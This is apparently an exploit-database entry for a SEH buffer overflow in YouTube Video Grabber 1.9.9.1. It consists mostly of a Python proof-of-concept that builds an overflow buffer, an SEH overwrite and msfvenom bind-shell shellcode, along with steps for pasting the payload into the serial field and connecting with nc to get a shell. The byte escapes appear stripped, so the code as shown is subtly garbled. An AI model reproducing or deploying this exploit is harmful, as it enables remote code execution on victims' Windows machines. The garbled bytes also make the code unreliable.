YouTube Video Grabber version 1.9.9.1 suffers from a SEH buffer overflow vulnerability.
# Exploit Title: YouTube Video Grabber 1.9.9.1 - Buffer Overflow (SEH)
# Date: 01.11.2021
# Software Link: https://www.litexmedia.com/ytgrabber.exe
# Exploit Author: Achilles
# Tested Version: 1.9.9.1
# Tested on: Windows 7 64bit
# 1.- Run python code : YouTube.py
# 2.- Open EVIL.txt and copy All content to Clipboard
# 3.- Open YouTube Video Grabber and press Enter Code
# 4.- Paste the Content of EVIL.txt into the 'Name and Serial Nummer'
# 5.- Click 'OK'
# 6.- Nc.exe Local IP Port 3110 and you will have a bind shell
# 7.- Greetings go:XiDreamzzXi,Metatron
#!/usr/bin/env python
import struct
buffer = "x41" * 712
nseh = "xEBx06x90x90" #jmp short 6
seh = struct.pack('<L',0x01c5642e) #pop ecx # pop ecx # ret | {PAGE_EXECUTE_WRITECOPY} [YouTubeGrabber.exe
nops = "x90" * 20
#msfvenom -p windows/shell_bind_tcp LPORT=3110 -f py -e x86/alpha_mixed EXITFUNC=thread -b "x00x0ax0dx20"
buf = b""
buf += b"x89xe1xd9xc6xd9x71xf4x5dx55x59x49x49x49"
buf += b"x49x49x49x49x49x49x49x43x43x43x43x43x43"
buf += b"x37x51x5ax6ax41x58x50x30x41x30x41x6bx41"
buf += b"x41x51x32x41x42x32x42x42x30x42x42x41x42"
buf += b"x58x50x38x41x42x75x4ax49x6bx4cx49x78x6e"
buf += b"x62x63x30x37x70x63x30x71x70x6dx59x4dx35"
buf += b"x56x51x6fx30x61x74x6cx4bx72x70x46x50x6e"
buf += b"x6bx43x62x56x6cx6cx4bx30x52x35x44x4cx4b"
buf += b"x31x62x54x68x74x4fx6ex57x42x6ax31x36x75"
buf += b"x61x49x6fx4ex4cx65x6cx50x61x33x4cx43x32"
buf += b"x36x4cx67x50x69x51x5ax6fx66x6dx47x71x5a"
buf += b"x67x4bx52x79x62x36x32x56x37x6ex6bx62x72"
buf += b"x44x50x4cx4bx51x5ax67x4cx6cx4bx52x6cx34"
buf += b"x51x32x58x5ax43x70x48x66x61x48x51x63x61"
buf += b"x6ex6bx31x49x31x30x65x51x38x53x4ex6bx50"
buf += b"x49x45x48x6ax43x77x4ax57x39x6cx4bx57x44"
buf += b"x6cx4bx76x61x4ax76x76x51x39x6fx6ex4cx4a"
buf += b"x61x5ax6fx34x4dx66x61x58x47x47x48x6dx30"
buf += b"x63x45x4ax56x54x43x71x6dx39x68x37x4bx71"
buf += b"x6dx57x54x62x55x68x64x56x38x6cx4bx30x58"
buf += b"x31x34x73x31x48x53x53x56x6ex6bx76x6cx52"
buf += b"x6bx6cx4bx32x78x65x4cx33x31x69x43x4cx4b"
buf += b"x77x74x4cx4bx65x51x38x50x6ex69x77x34x56"
buf += b"x44x65x74x31x4bx33x6bx50x61x42x79x73x6a"
buf += b"x30x51x6bx4fx4dx30x63x6fx61x4fx33x6ax6e"
buf += b"x6bx56x72x78x6bx4ex6dx61x4dx31x78x47x43"
buf += b"x46x52x37x70x75x50x52x48x62x57x70x73x45"
buf += b"x62x43x6fx42x74x63x58x50x4cx62x57x55x76"
buf += b"x36x67x59x6fx4ax75x6ex58x4cx50x37x71x75"
buf += b"x50x67x70x51x39x39x54x46x34x62x70x42x48"
buf += b"x44x69x4fx70x30x6bx75x50x59x6fx48x55x32"
buf += b"x4ax53x38x76x39x50x50x69x72x59x6dx37x30"
buf += b"x70x50x37x30x50x50x61x78x69x7ax54x4fx4b"
buf += b"x6fx59x70x59x6fx58x55x4ex77x31x78x34x42"
buf += b"x57x70x66x6cx74x66x4ex69x59x76x73x5ax44"
buf += b"x50x71x46x71x47x33x58x6ax62x79x4bx30x37"
buf += b"x50x67x59x6fx79x45x56x37x70x68x4dx67x39"
buf += b"x79x67x48x6bx4fx79x6fx4bx65x36x37x71x78"
buf += b"x44x34x68x6cx55x6bx38x61x69x6fx5ax75x70"
buf += b"x57x6dx47x75x38x42x55x42x4ex32x6dx71x71"
buf += b"x6bx4fx4ax75x62x48x71x73x52x4dx61x74x55"
buf += b"x50x6dx59x68x63x73x67x63x67x61x47x76x51"
buf += b"x5ax56x32x4ax75x42x51x49x63x66x59x72x79"
buf += b"x6dx43x56x78x47x37x34x57x54x65x6cx46x61"
buf += b"x67x71x6ex6dx43x74x76x44x64x50x4bx76x67"
buf += b"x70x70x44x42x74x50x50x52x76x30x56x63x66"
buf += b"x42x66x52x76x52x6ex36x36x51x46x46x33x46"
buf += b"x36x42x48x44x39x6ax6cx35x6fx6ex66x59x6f"
buf += b"x78x55x6dx59x4bx50x32x6ex62x76x42x66x6b"
buf += b"x4fx36x50x75x38x63x38x6fx77x65x4dx51x70"
buf += b"x39x6fx49x45x6dx6bx59x70x65x4dx67x5ax54"
buf += b"x4ax35x38x4dx76x6cx55x6fx4dx6dx4dx4bx4f"
buf += b"x68x55x35x6cx56x66x53x4cx35x5ax6bx30x69"
buf += b"x6bx59x70x50x75x37x75x6dx6bx72x67x32x33"
buf += b"x33x42x70x6fx43x5ax37x70x31x43x79x6fx79"
buf += b"x45x41x41"
pad ="B" * (7280 - len(buffer) - len(nseh+seh) - len(nops) -len(buf))
payload = buffer + nseh + seh + nops + buf + pad
try:
f=open("Evil.txt","w")
print "[+] Creating %s bytes evil payload.." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"
